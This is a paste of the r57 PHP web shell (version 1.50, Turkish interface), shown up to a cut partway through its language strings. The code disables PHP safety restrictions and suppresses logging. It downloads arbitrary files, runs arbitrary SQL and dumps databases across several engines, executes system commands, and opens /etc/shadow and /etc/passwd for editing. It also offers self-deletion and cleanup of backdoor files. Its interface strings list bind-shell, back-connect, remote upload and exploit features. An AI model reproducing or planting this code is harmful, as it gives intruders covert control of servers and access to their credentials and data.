· 5 years ago · Nov 14, 2020, 07:18 AM
1<?php error_reporting(0);
2 $language='tr';
3 $auth = 0;
4 @ini_restore("safe_mode");
5 @ini_restore("open_basedir");
6 @ini_restore("safe_mode_include_dir");
7 @ini_restore("safe_mode_exec_dir");
8 @ini_restore("disable_functions");
9 @ini_restore("allow_url_fopen");
10 @ini_set('error_log',NULL);
11 @ini_set('log_errors',0);
12 ;
13echo '';
14 if((!@function_exists('ini_get')) ||(@ini_get('open_basedir')!=NULL) ||(@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;
15}else{$open_basedir=0;
16};
17 define("starttime",@getmicrotime());
18 set_magic_quotes_runtime(0);
19 @set_time_limit(0);
20 @ini_set('max_execution_time',0);
21 @ini_set('output_buffering',0);
22 $safe_mode = @ini_get('safe_mode');
23 $version = '1.50<br/><br/><br/><br/>';
24 if(@version_compare(@phpversion(),'4.1.0') == -1) { $_POST = &$HTTP_POST_VARS;
25 $_GET = &$HTTP_GET_VARS;
26 $_SERVER = &$HTTP_SERVER_VARS;
27 $_COOKIE = &$HTTP_COOKIE_VARS;
28 } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v);
29 } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v);
30 } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) ||md5($_SERVER['PHP_AUTH_USER'])!==$name ||md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm=""');
31 header('HTTP/1.0 401 Unauthorized');
32 exit("<b>Access Denied</b>");
33 } } $head = '
34<html>
35<head>
36<meta http-equiv="Content-Type" content="text/html;
37 charset=windows-1251">
38<title>r57 Shell Version 1.50</title>
39<STYLE>
40
41tr {
42
43BORDER-RIGHT: black 1px solid;
44
45
46BORDER-TOP: black 1px solid;
47
48
49BORDER-LEFT: black 1px solid;
50
51
52BORDER-BOTTOM: black 1px solid;
53
54
55BORDER-COLOR: black;
56
57
58color: silver;
59
60
61}
62
63td {
64
65BORDER-RIGHT: black 1px solid;
66
67
68BORDER-TOP: black 1px solid;
69
70
71BORDER-LEFT: black 1px solid;
72
73
74BORDER-BOTTOM: black 1px solid;
75
76
77BORDER-COLOR: black;
78
79
80background-color:black;
81
82
83color: white;
84
85
86}
87
88
89
90.table1 {
91
92BORDER: 0px;
93
94
95BORDER-COLOR: #333333;
96
97
98BACKGROUND-COLOR: black;
99
100
101color: white;
102
103
104}
105
106.td1 {
107
108BORDER: 0px;
109
110
111BORDER-COLOR: #333333;
112
113
114font: 7pt Verdana;
115
116
117BACKGROUND-COLOR: black;
118
119
120color: green;
121
122
123}
124
125.tr1 {
126
127BORDER: 0px;
128
129
130BORDER-COLOR: #333333;
131
132
133color: #50AA20;
134
135
136}
137
138table {
139
140BORDER: #eeeeee 1px outset;
141
142
143BORDER-COLOR: #333333;
144
145
146BACKGROUND-COLOR: #131313;
147
148
149color: #50AA20;
150
151
152}
153
154input {
155
156border : solid 1px;
157
158
159border-color : #2D2D2D #252525 #252525 #252525;
160
161
162BACKGROUND-COLOR: black;
163
164
165font: 8pt Verdana;
166
167
168color: red;
169
170
171}
172
173select {
174
175BORDER-RIGHT: #ffffff 1px solid;
176
177
178BORDER-TOP: #999999 1px solid;
179
180
181BORDER-LEFT: #999999 1px solid;
182
183
184BORDER-BOTTOM: #ffffff 1px solid;
185
186
187BORDER-COLOR: #333333;
188
189
190BACKGROUND-COLOR: #131313;
191
192
193font: 8pt Verdana;
194
195
196color: white;
197;
198
199
200}
201
202submit {
203
204BORDER: buttonhighlight 2px outset;
205
206
207BACKGROUND-COLOR: #131313;
208
209
210width: 30%;
211
212
213color: white;
214
215
216}
217
218textarea {
219
220BORDER-RIGHT: #ffffff 1px solid;
221
222
223BORDER-TOP: #999999 1px solid;
224
225
226BORDER-LEFT: #999999 1px solid;
227
228
229BORDER-BOTTOM: #ffffff 1px solid;
230
231
232BORDER-COLOR: #333333;
233
234
235BACKGROUND-COLOR: black;
236
237
238font: Fixedsys bold;
239
240
241color: silver;
242
243
244}
245
246BODY {
247
248SCROLLBAR-ARROW-COLOR: #444444;
249
250
251SCROLLBAR-BASE-COLOR: #444444;
252
253
254margin: 1px;
255
256
257color: #50AA20;
258
259
260background-color: #131313;
261
262
263}
264
265.main {
266
267margin : -287px 0px 0px -490px;
268
269
270border : #000000 solid 1px;
271
272
273BORDER-COLOR: #333333;
274
275
276}
277
278.tt {
279
280background-color: black;
281
282
283}
284
285A:link {COLOR:red;
286 TEXT-DECORATION: none}
287
288A:visited { COLOR:red;
289 TEXT-DECORATION: none}
290
291A:active {COLOR:red;
292 TEXT-DECORATION: none}
293
294A:hover {color:blue;
295TEXT-DECORATION: none}
296
297</STYLE>
298
299<script language=\'javascript\'>
300function hide_div(id)
301{
302 document.getElementById(id).style.display = \'none\';
303
304 document.cookie=id+\'=0;
305\';
306
307}
308function show_div(id)
309{
310 document.getElementById(id).style.display = \'block\';
311
312 document.cookie=id+\'=1;
313\';
314
315}
316function change_divst(id)
317{
318 if (document.getElementById(id).style.display == \'none\')
319 show_div(id);
320
321 else
322 hide_div(id);
323
324}
325
326
327</script>';
328 class zipfile { var $datasec = array();
329 var $ctrl_dir = array();
330 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
331 var $old_offset = 0;
332 function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
333 if ($timearray['year'] <1980) { $timearray['year'] = 1980;
334 $timearray['mon'] = 1;
335 $timearray['mday'] = 1;
336 $timearray['hours'] = 0;
337 $timearray['minutes'] = 0;
338 $timearray['seconds'] = 0;
339 } return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) | ($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
340 } function addFile($data,$name,$time = 0) { $name = str_replace('\\','/',$name);
341 $dtime = dechex($this->unix2DosTime($time));
342 $hexdtime = '\x'.$dtime[6] .$dtime[7] .'\x'.$dtime[4] .$dtime[5] .'\x'.$dtime[2] .$dtime[3] .'\x'.$dtime[0] .$dtime[1];
343 eval('$hexdtime = "'.$hexdtime .'";
344');
345 $fr = "\x50\x4b\x03\x04";
346 $fr .= "\x14\x00";
347 $fr .= "\x00\x00";
348 $fr .= "\x08\x00";
349 $fr .= $hexdtime;
350 $unc_len = strlen($data);
351 $crc = crc32($data);
352 $zdata = gzcompress($data);
353 $zdata = substr(substr($zdata,0,strlen($zdata) -4),2);
354 $c_len = strlen($zdata);
355 $fr .= pack('V',$crc);
356 $fr .= pack('V',$c_len);
357 $fr .= pack('V',$unc_len);
358 $fr .= pack('v',strlen($name));
359 $fr .= pack('v',0);
360 $fr .= $name;
361 $fr .= $zdata;
362 $this ->datasec[] = $fr;
363 $cdrec = "\x50\x4b\x01\x02";
364 $cdrec .= "\x00\x00";
365 $cdrec .= "\x14\x00";
366 $cdrec .= "\x00\x00";
367 $cdrec .= "\x08\x00";
368 $cdrec .= $hexdtime;
369 $cdrec .= pack('V',$crc);
370 $cdrec .= pack('V',$c_len);
371 $cdrec .= pack('V',$unc_len);
372 $cdrec .= pack('v',strlen($name) );
373 $cdrec .= pack('v',0 );
374 $cdrec .= pack('v',0 );
375 $cdrec .= pack('v',0 );
376 $cdrec .= pack('v',0 );
377 $cdrec .= pack('V',32 );
378 $cdrec .= pack('V',$this ->old_offset );
379 $this ->old_offset += strlen($fr);
380 $cdrec .= $name;
381 $this ->ctrl_dir[] = $cdrec;
382 } function file() { $data = implode('',$this ->datasec);
383 $ctrldir = implode('',$this ->ctrl_dir);
384 return $data . $ctrldir . $this ->eof_ctrl_dir . pack('v',sizeof($this ->ctrl_dir)) . pack('v',sizeof($this ->ctrl_dir)) . pack('V',strlen($ctrldir)) . pack('V',strlen($data)) . "\x00\x00";
385 } } function compress(&$filename,&$filedump,$compress) { global $content_encoding;
386 global $mime_type;
387 if ($compress == 'bzip'&&@function_exists('bzcompress')) { $filename .= '.bz2';
388 $mime_type = 'application/x-bzip2';
389 $filedump = bzcompress($filedump);
390 } else if ($compress == 'gzip'&&@function_exists('gzencode')) { $filename .= '.gz';
391 $content_encoding = 'x-gzip';
392 $mime_type = 'application/x-gzip';
393 $filedump = gzencode($filedump);
394 } else if ($compress == 'zip'&&@function_exists('gzcompress')) { $filename .= '.zip';
395 $mime_type = 'application/zip';
396 $zipfile = new zipfile();
397 $zipfile ->addFile($filedump,substr($filename,0,-4));
398 $filedump = $zipfile ->file();
399 } else { $mime_type = 'application/octet-stream';
400 } } function moreread($temp){ global $lang,$language;
401 $str='';
402 if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){ $ffile = @fopen($temp,"r");
403 while(!@feof($ffile)){$str .= @fgets($ffile);
404} fclose($ffile);
405 }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){ $ffile = @fopen($temp,"r");
406 $str = @fread($ffile,@filesize($temp));
407 @fclose($ffile);
408 }elseif(@function_exists('file')){ $ffiles = @file ($temp);
409 foreach ($ffiles as $ffile) {$str .= $ffile;
410} }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp);
411 }elseif(@function_exists('readfile')){ $str = @readfile($temp);
412 }else{echo $lang[$language.'_text56'];
413} return $str;
414 } function readzlib($filename,$temp=''){ global $lang,$language;
415 $str='';
416 if(!$temp) {$temp=tempnam(@getcwd(),"copytemp");
417};
418 if(@copy("compress.zlib://".$filename,$temp)) { $str = moreread($temp);
419 }else echo $lang[$language.'_text119'];
420 @unlink($temp);
421 return $str;
422 } function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n";
423 $headers .= "MIME-Version: 1.0\r\n";
424 $headers .= "Content-Type: ".$attach['type'];
425 $headers .= ";
426 name=\"".$attach['name']."\"\r\n";
427 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
428 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
429 if(mail($to,$subj,"",$headers)) {return 1;
430} return 0;
431 } class my_sql { var $host = 'localhost';
432 var $port = '';
433 var $user = '';
434 var $pass = '';
435 var $base = '';
436 var $db = '';
437 var $connection;
438 var $res;
439 var $error;
440 var $rows;
441 var $columns;
442 var $num_rows;
443 var $num_fields;
444 var $dump;
445 function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) {$this->port = '3306';
446} if(!@function_exists('mysql_connect')) return 0;
447 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
448 if(is_resource($this->connection)) return 1;
449 break;
450 case 'MSSQL': if(empty($this->port)) {$this->port = '1433';
451} if(!@function_exists('mssql_connect')) return 0;
452 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
453 if($this->connection) return 1;
454 break;
455 case 'PostgreSQL': if(empty($this->port)) {$this->port = '5432';
456} $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
457 if(!@function_exists('pg_connect')) return 0;
458 $this->connection = @pg_connect($str);
459 if(is_resource($this->connection)) return 1;
460 break;
461 case 'Oracle': if(!@function_exists('ocilogon')) return 0;
462 $this->connection = @ocilogon($this->user,$this->pass,$this->base);
463 if(is_resource($this->connection)) return 1;
464 break;
465 } return 0;
466 } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1;
467 break;
468 case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1;
469 break;
470 case 'PostgreSQL': return 1;
471 break;
472 case 'Oracle': return 1;
473 break;
474 } return 0;
475 } function query($query) { $this->res=$this->error='';
476 switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection);
477 return 0;
478 } else if(is_resource($this->res)) {return 1;
479} return 2;
480 break;
481 case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error';
482 return 0;
483 } else if(@mssql_num_rows($this->res) >0) {return 1;
484} return 2;
485 break;
486 case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection);
487 return 0;
488 } else if(@pg_num_rows($this->res) >0) {return 1;
489} return 2;
490 break;
491 case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error';
492 } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2;
493 return 1;
494 } $error = @ocierror();
495 $this->error=$error['message'];
496 } break;
497 } return 0;
498 } function get_result() { $this->rows=array();
499 $this->columns=array();
500 $this->num_rows=$this->num_fields=0;
501 switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res);
502 $this->num_fields=@mysql_num_fields($this->res);
503 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
504 @mysql_free_result($this->res);
505 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
506return 1;
507} break;
508 case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res);
509 $this->num_fields=@mssql_num_fields($this->res);
510 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
511 @mssql_free_result($this->res);
512 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
513return 1;
514};
515 break;
516 case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res);
517 $this->num_fields=@pg_num_fields($this->res);
518 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
519 @pg_free_result($this->res);
520 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
521return 1;
522} break;
523 case 'Oracle': $this->num_fields=@ocinumcols($this->res);
524 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
525 @ocifreestatement($this->res);
526 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
527return 1;
528} break;
529 } return 0;
530 } function dump($table) { if(empty($table)) return 0;
531 $this->dump=array();
532 $this->dump[0] = '##';
533 $this->dump[1] = '## --------------------------------------- ';
534 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
535 $this->dump[3] = '## Database: '.$this->base;
536 $this->dump[4] = '## Table: '.$table;
537 $this->dump[5] = '## --------------------------------------- ';
538 switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump';
539 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
540 if(!$this->get_result()) return 0;
541 $this->dump[] = $this->rows[0]['Create Table'];
542 $this->dump[] = '## --------------------------------------- ';
543 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
544 if(!$this->get_result()) return 0;
545 for($i=0;
546$i<$this->num_rows;
547$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);
548} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `",$this->columns).'`) VALUES (\''.@implode("', '",$this->rows[$i]).'\');
549';
550 } break;
551 case 'MSSQL': $this->dump[0] = '## MSSQL dump';
552 if($this->query('SELECT * FROM '.$table)!=1) return 0;
553 if(!$this->get_result()) return 0;
554 for($i=0;
555$i<$this->num_rows;
556$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);
557} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');
558';
559 } break;
560 case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump';
561 if($this->query('SELECT * FROM '.$table)!=1) return 0;
562 if(!$this->get_result()) return 0;
563 for($i=0;
564$i<$this->num_rows;
565$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);
566} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');
567';
568 } break;
569 case 'Oracle': $this->dump[0] = '## ORACLE dump';
570 $this->dump[] = '## under construction';
571 break;
572 default: return 0;
573 break;
574 } return 1;
575 } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection);
576 break;
577 case 'MSSQL': @mssql_close($this->connection);
578 break;
579 case 'PostgreSQL': @pg_close($this->connection);
580 break;
581 case 'Oracle': @oci_close($this->connection);
582 break;
583 } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res);
584 break;
585 case 'MSSQL': return @mssql_affected_rows($this->res);
586 break;
587 case 'PostgreSQL': return @pg_affected_rows($this->res);
588 break;
589 case 'Oracle': return @ocirowcount($this->res);
590 break;
591 default: return 0;
592 break;
593 } } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="download_file"&&!empty($_POST['d_name'])) { if($file=@fopen($_POST['d_name'],"r")){$filedump = @fread($file,@filesize($_POST['d_name']));
594@fclose($file);
595} else if ($file=readzlib($_POST['d_name'])) {$filedump = $file;
596}else {err(1,$_POST['d_name']);
597$_POST['cmd']="";
598} if(isset($_POST['cmd'])) { @ob_clean();
599 $filename = @basename($_POST['d_name']);
600 $content_encoding=$mime_type='';
601 compress($filename,$filedump,$_POST['compress']);
602 if (!empty($content_encoding)) {header('Content-Encoding: '.$content_encoding);
603} header("Content-type: ".$mime_type);
604 header("Content-disposition: attachment;
605 filename=\"".$filename."\";
606");
607 echo $filedump;
608 exit();
609 } } if(isset($_GET['phpinfo'])) {echo @phpinfo();
610echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
611die();
612} if (!empty($_POST['cmd']) &&$_POST['cmd']=="db_query") { echo $head;
613 $sql = new my_sql();
614 $sql->db = $_POST['db'];
615 $sql->host = $_POST['db_server'];
616 $sql->port = $_POST['db_port'];
617 $sql->user = $_POST['mysql_l'];
618 $sql->pass = $_POST['mysql_p'];
619 $sql->base = $_POST['mysql_db'];
620 $querys = @explode(';
621',$_POST['db_query']);
622 echo '<body bgcolor=#000000>';
623 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
624 else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
625 else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
626 switch($sql->query($query)) { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
627 break;
628 case '1': if($sql->get_result()) { echo "<table width=100%>";
629 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
630 $keys = @implode("
631</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>
632",$sql->columns);
633 echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>
634".$keys."
635</b></font></td></tr>";
636 for($i=0;
637$i<$sql->num_rows;
638$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
639 $values = @implode("
640</font></td><td><font face=Verdana size=-2>
641",$sql->rows[$i]);
642 echo '<tr><td><font face=Verdana size=-2>
643'.$values.'
644</font></td></tr>';
645 } echo "</table>";
646 } break;
647 case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
648 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
649 break;
650 } } } } } echo "<br><form name=form method=POST>";
651 echo in('hidden','db',0,$_POST['db']);
652 echo in('hidden','db_server',0,$_POST['db_server']);
653 echo in('hidden','db_port',0,$_POST['db_port']);
654 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
655 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
656 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
657 echo in('hidden','cmd',0,'db_query');
658 echo "<div align=center>";
659 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
660 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;
661\nSELECT * FROM user;
662"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
663 echo "</form>";
664 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
665die();
666 } if(isset($_GET['delete'])) { @unlink(__FILE__);
667 } if(isset($_GET['tmp'])) { @unlink("/tmp/bdpl");
668 @unlink("/tmp/back");
669 @unlink("/tmp/bd");
670 @unlink("/tmp/bd.c");
671 @unlink("/tmp/dp");
672 @unlink("/tmp/dpc");
673 @unlink("/tmp/dpc.c");
674 @unlink("/tmp/prxpl");
675 @unlink("/tmp/grep.txt");
676 } if(isset($_GET['phpini'])) { echo $head;
677 function U_value($value) { if ($value == '') return '<i>no value</i>';
678 if (@is_bool($value)) return $value ?'TRUE': 'FALSE';
679 if ($value === null) return 'NULL';
680 if (@is_object($value)) $value = (array) $value;
681 if (@is_array($value)) { @ob_start();
682 print_r($value);
683 $value = @ob_get_contents();
684 @ob_end_clean();
685 } return U_wordwrap((string) $value);
686 } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str),100,'<wbr />',true);
687 return @preg_replace('!(&[^;
688]*)<wbr />([^;
689]*;
690)!','$1$2<wbr />',$str);
691 } if (@function_exists('ini_get_all')) { $r = '';
692 echo '<table width=100%>','<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
693 foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
694 } echo $r;
695 echo '</table>';
696 } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
697 die();
698 } if(isset($_GET['cpu'])) { echo $head;
699 echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
700 $cpuf = @file("cpuinfo");
701 if($cpuf) { $c = @sizeof($cpuf);
702 for($i=0;
703$i<$c;
704$i++) { $info = @explode(":",$cpuf[$i]);
705 if($info[1]==""){$info[1]="---";
706} $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
707 } echo $r;
708 } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
709 } echo '</table>';
710 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
711 die();
712 } if(isset($_GET['mem'])) { echo $head;
713 echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
714 $memf = @file("meminfo");
715 if($memf) { $c = sizeof($memf);
716 for($i=0;
717$i<$c;
718$i++) { $info = explode(":",$memf[$i]);
719 if($info[1]==""){$info[1]="---";
720} $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
721 } echo $r;
722 } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
723 } echo '</table>';
724 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">green</a> ]</b></font></div>";
725 die();
726 } if(isset($_GET['dmesg(8)'])) {$_POST['cmd'] = 'dmesg(8)';
727} if(isset($_GET['free'])) {$_POST['cmd'] = 'free';
728} if(isset($_GET['vmstat'])) {$_POST['cmd'] = 'vmstat';
729} if(isset($_GET['lspci'])) {$_POST['cmd'] = 'lspci';
730} if(isset($_GET['lsdev'])) {$_POST['cmd'] = 'lsdev';
731} if(isset($_GET['procinfo'])) {$_POST['cmd']='cat /proc/cpuinfo';
732} if(isset($_GET['version'])) {$_POST['cmd']='cat /proc/version';
733} if(isset($_GET['interrupts'])) {$_POST['cmd']='cat /proc/interrupts';
734} if(isset($_GET['realise1'])) {$_POST['cmd'] = 'cat /etc/*realise';
735} if(isset($_GET['service'])) {$_POST['cmd'] = 'service --status-all';
736} if(isset($_GET['ifconfig'])) {$_POST['cmd'] = 'ifconfig';
737} if(isset($_GET['w'])) {$_POST['cmd'] = 'w';
738} if(isset($_GET['who'])) {$_POST['cmd'] = 'who';
739} if(isset($_GET['uptime'])) {$_POST['cmd'] = 'uptime';
740} if(isset($_GET['last'])) {$_POST['cmd'] = 'last -n 10';
741} if(isset($_GET['psaux'])) {$_POST['cmd'] = 'ps -aux';
742} if(isset($_GET['netstat'])) {$_POST['cmd'] = 'netstat -a';
743} if(isset($_GET['lsattr'])) {$_POST['cmd'] = 'lsattr -va';
744} if(isset($_GET['syslog'])) {$_POST['cmd']='edit_file';
745$_POST['e_name'] = '/etc/syslog.conf';
746} if(isset($_GET['fstab'])) {$_POST['cmd']='edit_file';
747$_POST['e_name'] = '/etc/fstab';
748} if(isset($_GET['fdisk'])) {$_POST['cmd'] = 'fdisk -l';
749} if(isset($_GET['df'])) {$_POST['cmd'] = 'df -h';
750} if(isset($_GET['realise2'])) {$_POST['cmd']='edit_file';
751$_POST['e_name'] = '/etc/issue.net';
752} if(isset($_GET['hosts'])) {$_POST['cmd']='edit_file';
753$_POST['e_name'] = '/etc/hosts';
754} if(isset($_GET['resolv'])) {$_POST['cmd']='edit_file';
755$_POST['e_name'] = '/etc/resolv.conf';
756} if(isset($_GET['systeminfo'])) {$_POST['cmd'] = 'systeminfo';
757} if(isset($_GET['shadow'])) {$_POST['cmd']='edit_file';
758$_POST['e_name'] = '/etc/shadow';
759} if(isset($_GET['passwd'])) {$_POST['cmd']='edit_file';
760$_POST['e_name'] = '/etc/passwd';
761} $lang=array( 'tr_text1'=>'Komut Uygula', 'tr_text2'=>'Server uzerinde komut calistir ', 'tr_text3'=>'Komut istemi ', 'tr_text4'=>'Calisma Dizini ', 'tr_text5'=>'Servere Dosya Upload Et', 'tr_text6'=>'Yerel Dosya ', 'tr_text7'=>'Dizin Veya Dosya Bul ', 'tr_text8'=>'Sec', 'tr_butt1'=>'Uygula', 'tr_butt2'=>'Yukle', 'tr_text9'=>'Porta baglan /bin/bash', 'tr_text10'=>'Port', 'tr_text11'=>'Sifre Giris', 'tr_butt3'=>'Baglan', 'tr_text12'=>'Back-Connect', 'tr_text13'=>'IP', 'tr_text14'=>'Port', 'tr_butt4'=>'Baglan', 'tr_text15'=>'Uzaktan servere dosya yukle', 'tr_text16'=>'ile', 'tr_text17'=>'Uzak Dosya', 'tr_text18'=>'Yerel Dosya', 'tr_text19'=>'Exploits', 'tr_text20'=>'Kullan', 'tr_text21'=>'
762Yeni ad', 'tr_text22'=>'datapipe', 'tr_text23'=>'Yerel Port', 'tr_text24'=>'Uzak Host', 'tr_text25'=>'Uzak Port', 'tr_text26'=>'Kullan', 'tr_butt5'=>'Iste', 'tr_text28'=>'Guvenlik Modunda Calis', 'tr_text29'=>'Giris Yok ', 'tr_butt6'=>'Degistir', 'tr_text30'=>'Cat file', 'tr_butt7'=>'Goster', 'tr_text31'=>'Dosya Bulunamadi', 'tr_text32'=>'PHP Kod Degerlendir ', 'tr_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'tr_butt8'=>'Testet', 'tr_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.', 'tr_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.', 'tr_text36'=>'Database[VeriTabani]', 'tr_text37'=>'Kullanici', 'tr_text38'=>'Sifre', 'tr_text39'=>'Tablo', 'tr_text40'=>'Dump database table[DB Tablosu dok]', 'tr_butt9'=>'Dump', 'tr_text41'=>'DB dosyalarini kaydet.[Dump filed]', 'tr_text42'=>'Dosya Duzenle ', 'tr_text43'=>'Dosya Duzenlemek icin', 'tr_butt10'=>'Kaydet', 'tr_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor', 'tr_text45'=>'Dosya Kaydedildi', 'tr_text46'=>'PHP info Goster()', 'tr_text47'=>'Php.ini dosyasinda ki degiskenleri goster', 'tr_text48'=>'Temp dosylarini sil', 'tr_butt11'=>'Dosya Duzenle', 'tr_text49'=>'Server dan bu scripti sil', 'tr_text50'=>'CPU bilgisini incele', 'tr_text51'=>'Memory[hafiza] bilgisini incele]', 'tr_text52'=>'Metni Bul ', 'tr_text53'=>'Klasor Bul', 'tr_text54'=>'Dosyalarda ki Metni Bul', 'tr_butt12'=>'Bul', 'tr_text55'=>'Dosya Bul ', 'tr_text56'=>'Bulunmadi :( KeyCoder :)', 'tr_text57'=>'Olustur/Sil Dosya/Dizin ', 'tr_text58'=>'isim', 'tr_text59'=>'Dosya', 'tr_text60'=>'Dizin', 'tr_butt13'=>'Olustur/Sil', 'tr_text61'=>'Dosya Olustur', 